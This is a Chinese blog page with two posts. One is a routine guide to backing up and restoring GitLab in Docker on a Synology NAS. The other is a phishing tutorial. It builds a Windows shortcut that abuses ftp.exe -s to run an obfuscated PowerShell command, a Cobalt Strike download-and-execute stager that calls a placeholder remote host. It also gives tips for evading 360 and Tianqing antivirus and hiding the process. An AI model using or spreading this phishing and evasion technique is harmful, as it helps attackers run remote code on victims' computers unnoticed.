knickers 发布的文章

群晖gitlab数据备份与恢复

A、备份

  • 1、docker进入gitlab的终端
    > docker exec -it synology_gitlab bash
  • 2、进入可执行命令目录
    > cd /home/git/gitlab/bin
  • 3、执行备份命令
    > ./rake gitlab:backup:create

B、恢复

  • 1、拷贝之前备份的*.tar文件到群晖File Station目录【/docker/gitlab/backups/】下面
  • 2、修改权限
    > chown git:git /home/git/data/backups/.tar
    > chmod 755 /home/git/data/backups/
    .tar
  • 3、执行恢复命令
    > sudo -u git -H bundle exec rake gitlab:backup:restore RAILS_ENV=production BACKUP=1508401391_2017_10_19_9.3.7

注:

  • 1、生成的备份文件在群晖文件管理器/docker/gitlab/backups/下面
  • 2、恢复文件时BACKUP=后面的参数为*.tar文件名【_gitlab_backup.tar】前面的内容

https://blog.xxzj990.top/%E7%BE%A4%E6%99%96gitlab%E6%95%B0%E6%8D%AE%E5%A4%87%E4%BB%BD%E4%B8%8E%E6%81%A2%E5%A4%8D/

钓鱼之利用ftp命令搞事情

利用方法来自于去年红队会议中红雨滴分析的一个样本文件,当时只是记录了下,后来就一直没时间看,今天看To do的时候发现这个记录,就想办法把这个利用落地。

ftp -s

以前的抓鸡教程中经常会有用-s参数执行多条上传保存命令。

而ftp参数!可以执行系统命令。两个结合下就可以达到命令执行的效果。

ftp> ! 从ftp子系统退出到外壳

image-20200704194439258

创建一个快捷方式(参数混淆绕过360)

C:\Windows\System32\ftp.exe -""s:aaa.dll

image-20200704203547925

新建一个txt 文件名aaa.dll,内容是cs的powershell上线命令。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).dow"nloa"dstring('http://xxxxxxx:802/a1111'))"

image-20200704201105355

image-20200704201132063

但是现在第三方调用powershell这种方法已经被360拦截。

看了下特征可以绕过天擎。

1、ftp执行参数混淆

2、第三方调用powershell不触发参数行为

3、点击最小化。

image-20200705014326462

图标问题可以查看我上次写的文章制作ICO,使用网络图片。

快捷方式图标下载执行exe

不过这种执行在任务栏会驻留。

image-20200705014500938

但是不用担心,ftp进程被关闭后,powershell还是会独立运行,他的父进程不是ftp

image-20200705014643978

image-20200705014703275

未知黑客团队钓鱼样本分析